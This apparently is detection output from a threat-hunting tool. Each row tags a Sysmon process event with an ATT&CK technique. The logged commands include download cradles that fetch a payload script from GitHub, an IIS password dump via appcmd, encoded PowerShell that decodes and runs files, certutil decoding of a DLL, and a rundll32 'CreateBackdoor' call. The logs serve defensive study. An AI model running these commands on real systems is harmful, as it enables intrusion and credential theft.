C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4893 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.238 + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.305063,2019-05-27T05:29:20.305063+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5985 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.265 + 365ABB72-3D70-5CEB-0000-001072E6FF00 + 2640 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435983.254713,2019-07-30T01:33:03.254713+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt "C:\Windows\system32\Default_File_Path.ps1" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4892 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.184 + 747F3D96-660F-5D3F-0000-00109B328600 + 6020 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt "C:\Windows\system32\Default_File_Path.ps1" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553017268.977707,2019-03-19T21:41:08.977707+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966184 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 17:41:08.947 + 365ABB72-29B4-5C91-0000-0010289AC308 + 3748 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.EXE /c malwr.vbs + C:\Windows\system32\ + EXAMPLE\user01 + 365ABB72-2209-5C91-0000-0020FA479E03 + 0x39e47fa + 2 + High + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-1A4A-5C91-0000-0010455A0000 + 512 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243514 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.511 + 747F3D96-9F61-5E75-0000-0010736B1E00 + 8116 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11126 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 02:08:00.336 + 365ABB72-8B80-5CD3-0000-001065512A00 + 2264 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c notepad.exe + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-863B-5CD3-0000-00204A390100 + 0x1394a + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-8B77-5CD3-0000-0010E8FD2900 + 3836 + C:\Windows\System32\sdclt.exe + ? + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243514 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.511 + 747F3D96-9F61-5E75-0000-0010736B1E00 + 8116 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243514 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.511 + 747F3D96-9F61-5E75-0000-0010736B1E00 + 8116 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.204919,2019-05-27T05:29:20.204919+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5982 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.164 + 365ABB72-3D70-5CEB-0000-0010B2E2FF00 + 2108 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5532 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 15:08:07.355 + 747F3D96-A357-5D45-0000-0010BD149A01 + 5396 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-A356-5D45-0000-001014F99901 + 4056 + C:\Windows\System32\mmc.exe + "C:\Windows\System32\mmc.exe" eventvwr.msc + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1589296009.450298,2020-05-12T19:06:49.450298+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 143189 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-12 15:06:49.415 + 747F3D96-BB89-5EBA-0000-001019683600 + 4688 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-B086-5EBA-0000-0020BF9E0800 + 0x89ebf + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-BB89-5EBA-0000-001042653600 + 1088 + C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe + C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil -f -decode fi.b64 AllTheThings.dll )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4890 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:58.940 + 747F3D96-660A-5D3F-0000-0010FFF28500 + 700 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil -f -decode fi.b64 AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-660A-5D3F-0000-0010B9E08500 + 3184 + C:\Windows\System32\cmd.exe + cmd /c certutil -f -decode fi.b64 AllTheThings.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16150 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 18:10:42.653 + 365ABB72-1022-5CD7-0000-0010DF121C00 + 3248 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + NT AUTHORITY\SYSTEM + 365ABB72-8693-5CD7-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-8693-5CD7-0000-0010765E0000 + 492 + C:\Windows\System32\lsass.exe + C:\Windows\system32\lsass.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1140] Deobfuscate/Decode Files or Information,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ) tried decoding file or information,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4890 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:58.940 + 747F3D96-660A-5D3F-0000-0010FFF28500 + 700 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil -f -decode fi.b64 AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-660A-5D3F-0000-0010B9E08500 + 3184 + C:\Windows\System32\cmd.exe + cmd /c certutil -f -decode fi.b64 AllTheThings.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4890 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:58.940 + 747F3D96-660A-5D3F-0000-0010FFF28500 + 700 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + 